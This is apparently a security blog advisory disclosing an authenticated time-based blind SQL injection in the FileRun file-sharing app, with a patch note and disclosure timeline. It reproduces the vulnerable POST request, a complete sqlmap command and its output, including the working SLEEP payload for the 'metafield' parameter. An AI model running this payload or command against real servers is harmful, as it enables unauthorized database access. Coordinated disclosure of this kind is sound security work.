Some time ago while doing a pentest, we found a vulnerability in a file sharing web application named FileRun. This application allows us to access our files anywhere through self-hosted secure cloud storage, backup and sharing files for our photos, videos, files and more.

The Vulnerability

The vulnerability was found after the authentication. After we logged in as any user, go to Search -> Drop down menu -> Search Metadata -> Choose any, for this example I choose Tags. This will generate a POST request to the server like below:

POST /?module=search§ion=ajax&page=grid HTTP/1.1
Host: 192.168.2.133
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.2.133/
Content-Length: 88
Cookie: FileRunSID=u71u3j1fiqjk1ntmsm7f84d8c4; language=english
Connection: close
Pragma: no-cache
Cache-Control: no-cache

metafield=7&searchType=meta&keyword=&searchPath=%2FROOT%2FHOME&path=%252FROOT%252FSEARCH

We notice that the metafield parameter might be vulnerable to SQL Injection, therefore we injected a single quote after the value (e.g. metafield=7′) and examined the server response with interesting error below:

HTTP/1.0 500 Internal Server Error
Date: Wed, 20 Sep 2017 09:46:48 GMT
Server: Apache/2.4.7 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Judging to that response, my spider sense was tingling and throwing our awesome and favorite tool for fast confirmation to the metafield parameter.

root@kali:~# sqlmap -u "http://192.168.2.10/?module=search§ion=ajax&page=grid" --data "metafield=7&searchType=meta&keyword=&searchPath=%2FROOT%2FHOME&path=%252FROOT%252FSEARCH" --cookie "FileRunSID=qpgjv055ne2tluvnp10fao0gl3; language=english" -p metafield --dbms=mysql --level=5 --technique=T --dbs
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.1.8#stable}
|_ -| . [)]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:49:19

[10:56:03] [INFO] testing connection to the target URL
[10:56:03] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[10:56:03] [WARNING] heuristic (basic) test shows that POST parameter 'metafield' might not be injectable
[10:56:03] [INFO] testing for SQL injection on POST parameter 'metafield'
[10:56:03] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[10:56:03] [WARNING] time-based comparison requires larger statistical model, please wait............................ (done)
[10:56:04] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (comment)'
[10:56:04] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
<strong>[10:56:14] [INFO] POST parameter 'metafield' appears to be 'MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)' injectable</strong>
for the remaining tests, do you want to include all tests for 'MySQL' extending provided risk (1) value? [Y/n] y
[10:56:18] [INFO] checking if the injection point on POST parameter 'metafield' is a false positive
POST parameter 'metafield' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 154 HTTP(s) requests:
---
Parameter: metafield (POST)
    Type: AND/OR time-based blind
    Title: MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)
    Payload: metafield=7) AND (SELECT * FROM (SELECT(SLEEP(5)))uKlV) AND (3045=3045&amp;searchType=meta&amp;keyword=&amp;searchPath=/ROOT/HOME&amp;path=%2FROOT%2FSEARCH
---
[10:59:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7
back-end DBMS: MySQL &gt;= 5.0.12
[10:59:27] [INFO] fetching database names
[10:59:27] [INFO] fetching number of databases
[10:59:27] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[10:59:28] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
2
[10:59:39] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[10:59:45] [INFO] adjusting time delay to 1 second due to good response times
information_schema
[11:00:42] [INFO] retrieved: <strong>filerun</strong>
available databases [2]:
[*] filerun
[*] information_schema

[11:01:04] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 87 times
[11:01:04] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.2.10'

[*] shutting down at 11:01:04

And yes, the vulnerability is confirmed.

Proof of Concept

Here we create a simple script to extract current database using time-based technique.
https://github.com/modpr0be/exploit-dev/blob/master/exploit-repo/filerun/poc-filerun.py

Patch and Fix

We already contacted FileRun developer, Afian AB, and work closely to disclose this vulnerability. FileRun users are suggested to apply immediate software update to latest version using the installation control panel. Please referring to this docs.

Aftermath

Thanks to Vlad Roman who quickly responded to our emails to take immediate action on this finding. Here is the communication log:

Sept 20, 2017 Initial contact with FileRun team
Sept 22, 2017 Vulnerability acknowledged by FileRun team and said that a patch will be released in a couple of days soon.
Sept 25, 2017 FileRun team released a patch.
Sept 27, 2017 Draft of security advisory document was sent to FileRun team.
Sept 29, 2017 Advisory published.

References

About the Author modpr0be

Thomas Gregory (modpr0be) saat ini adalah direktur dan pemilik PT Spentera, sebuah perusahaan yang fokus dalam bidang penetration test, incident response, intrusion analysis and forensic investigation. Saya sering memberikan konsultasi tentang strategi keamanan kepada investor, mitra, dan pelanggan. Di sela-sela pekerjaannya, penulis memberikan materi dalam bentuk pelatihan dan kontribusi komunitas dalam bentuk seminar, workshop, dan diskusi dengan berbagai topik seperti teknik peretasan, teknik eksploitasi, dan analisis intrusi. Saya juga berkontribusi untuk repositori eksploit Metasploit Framework sebagai pengembang kode eksploit. Saat ini saya memegang sertifikasi dari Offensive Security Certified Professional (OSCP), Offensive Security Certified Expert (OSCE), ISO/IEC ISMS 27001: 2013 Lead Auditor/Auditor, GIAC Certified Intrusion Analyst (GCIA), dan Offensive Security Exploitation Expert (OSEE). Jika ingin menghubungi saya dapat melalui email di tom at spentera dot id.

Tinggalkan Balasan

Please log in using one of these methods to post your comment:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout /  Ubah )

Foto Google

You are commenting using your Google account. Logout /  Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout /  Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout /  Ubah )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d blogger menyukai ini: